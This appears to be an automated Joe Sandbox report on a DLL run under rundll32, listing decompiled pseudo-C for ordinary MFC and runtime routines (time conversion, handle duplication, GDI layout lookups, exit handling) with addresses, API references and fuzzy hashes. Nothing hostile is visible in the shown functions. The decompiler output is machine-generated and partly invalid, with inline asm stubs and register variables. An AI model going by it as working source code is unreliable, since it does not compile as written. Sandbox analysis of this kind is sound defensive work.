                                                                                                            0x1003229b
                                                                                                            0x1003229d
                                                                                                            0x100322b3
                                                                                                            0x100322ba
                                                                                                            0x1003230d
                                                                                                            0x10032352
                                                                                                            0x00000000
                                                                                                            0x10032317
                                                                                                            0x1003231d
                                                                                                            0x10032344
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032346
                                                                                                            0x00000000
                                                                                                            0x10032327
                                                                                                            0x10032330
                                                                                                            0x10032336
                                                                                                            0x10032336
                                                                                                            0x10032359
                                                                                                            0x10032359
                                                                                                            0x1003235d
                                                                                                            0x1003235d
                                                                                                            0x10032369
                                                                                                            0x10032394
                                                                                                            0x10032394
                                                                                                            0x10032394
                                                                                                            0x10032375
                                                                                                            0x1003237c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003238a
                                                                                                            0x1003231d
                                                                                                            0x1003230d
                                                                                                            0x100322bc
                                                                                                            0x100322c4
                                                                                                            0x100322d2
                                                                                                            0x100322c6
                                                                                                            0x100322c6
                                                                                                            0x100322c6
                                                                                                            0x100322ec
                                                                                                            0x100322f6
                                                                                                            0x100322fe
                                                                                                            0x10032303
                                                                                                            0x10032303
                                                                                                            0x00000000
                                                                                                            0x100322fe
                                                                                                            0x100322a8
                                                                                                            0x100322ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 100322EC
                                                                                                            • UpdateWindow.USER32(?), ref: 10032303
                                                                                                            • GetParent.USER32(?), ref: 1003236E
                                                                                                            • PostMessageA.USER32 ref: 1003238A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ParentPostSendUpdateWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4141989945-2766056989
                                                                                                            • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                                                            • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026A96 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}














                                                                                                            0x10026a96
                                                                                                            0x10026a96
                                                                                                            0x10026a97
                                                                                                            0x10026aa3
                                                                                                            0x10026aaa
                                                                                                            0x10026ab6
                                                                                                            0x10026ac0
                                                                                                            0x10026ac4
                                                                                                            0x10026ac9
                                                                                                            0x10026acc
                                                                                                            0x10026ad8
                                                                                                            0x10026ace
                                                                                                            0x10026ad2
                                                                                                            0x10026ad2
                                                                                                            0x10026ae5
                                                                                                            0x10026aef
                                                                                                            0x10026af3
                                                                                                            0x10026af8
                                                                                                            0x10026afb
                                                                                                            0x10026b06
                                                                                                            0x10026b06
                                                                                                            0x10026b06
                                                                                                            0x10026afd
                                                                                                            0x10026b00
                                                                                                            0x10026b00
                                                                                                            0x10026b14
                                                                                                            0x10026b18
                                                                                                            0x10026b1e
                                                                                                            0x10026b26
                                                                                                            0x10026b2c
                                                                                                            0x10026b2c
                                                                                                            0x10026b38
                                                                                                            0x10026b3e
                                                                                                            0x10026b40
                                                                                                            0x10026b46
                                                                                                            0x10026b46
                                                                                                            0x10026b4e
                                                                                                            0x10026aa5
                                                                                                            0x1001ce6f
                                                                                                            0x1001ce72
                                                                                                            0x1001ce7c
                                                                                                            0x1001ce83
                                                                                                            0x1001ce88
                                                                                                            0x1001ce8c
                                                                                                            0x1001ce8c

                                                                                                            APIs
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1172841412-4125583295
                                                                                                            • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                                                            • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100257A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}











                                                                                                            0x100257a8
                                                                                                            0x100257ab
                                                                                                            0x100257b0
                                                                                                            0x100257b2
                                                                                                            0x100257b7
                                                                                                            0x100257ba
                                                                                                            0x100257c9
                                                                                                            0x100257c9
                                                                                                            0x100257bc
                                                                                                            0x100257c5
                                                                                                            0x100257c5
                                                                                                            0x100257cb
                                                                                                            0x100257dc
                                                                                                            0x100257ee
                                                                                                            0x100257f2
                                                                                                            0x100257fa
                                                                                                            0x100257fa
                                                                                                            0x10025807
                                                                                                            0x10025807
                                                                                                            0x1002580f
                                                                                                            0x10025815
                                                                                                            0x1002581d

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                                                            • GetLastError.KERNEL32(?), ref: 10025800
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3907606552-4125583295
                                                                                                            • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                                                            • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}








                                                                                                            0x10034ce8
                                                                                                            0x10034ced
                                                                                                            0x10034cf8
                                                                                                            0x10034cfa
                                                                                                            0x10034cfd
                                                                                                            0x10034d05
                                                                                                            0x10034d14
                                                                                                            0x10034d16
                                                                                                            0x10034d19
                                                                                                            0x10034d1b
                                                                                                            0x10034d1e
                                                                                                            0x10034d37
                                                                                                            0x10034d37
                                                                                                            0x10034d20
                                                                                                            0x10034d20
                                                                                                            0x10034d22
                                                                                                            0x10034d25
                                                                                                            0x10034d2a
                                                                                                            0x10034d2f
                                                                                                            0x10034d30
                                                                                                            0x10034d30
                                                                                                            0x10034d39
                                                                                                            0x10034d3d
                                                                                                            0x10034d47
                                                                                                            0x10034d47
                                                                                                            0x10034d57
                                                                                                            0x10034d5f
                                                                                                            0x10034d67
                                                                                                            0x10034d6f

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10034CE8
                                                                                                              • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                            • API String ID: 3519838083-526586445
                                                                                                            • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                                                            • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                                                            0x10028bcd
                                                                                                            0x10028bcf
                                                                                                            0x10028bdb
                                                                                                            0x10028bdd
                                                                                                            0x10028be5
                                                                                                            0x10028bf8
                                                                                                            0x10028bfc
                                                                                                            0x10028bff
                                                                                                            0x10028bff
                                                                                                            0x10028be7
                                                                                                            0x10028bf0
                                                                                                            0x10028bf0
                                                                                                            0x10028c09

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$SetLayout
                                                                                                            • API String ID: 4275029093-2147214759
                                                                                                            • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                                                            • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                                                            0x10028b96
                                                                                                            0x10028ba4
                                                                                                            0x10028bac
                                                                                                            0x10028bb9
                                                                                                            0x10028bbc
                                                                                                            0x10028bae
                                                                                                            0x10028bb3
                                                                                                            0x10028bb3
                                                                                                            0x10028bc5

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$GetLayout
                                                                                                            • API String ID: 4275029093-2396518106
                                                                                                            • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                                                            • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                                                            0x10011dd4
                                                                                                            0x10011ddc
                                                                                                            0x10011de4
                                                                                                            0x10011dec
                                                                                                            0x10011df2
                                                                                                            0x10011df2
                                                                                                            0x10011dec
                                                                                                            0x10011df8

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                                                            • ExitProcess.KERNEL32 ref: 10011DF8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 75539706-1276376045
                                                                                                            • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                                                            • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100394B0 Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011BF0(0x1003b2f6, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10001000(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							 *(_t168 + 8) = _t182;
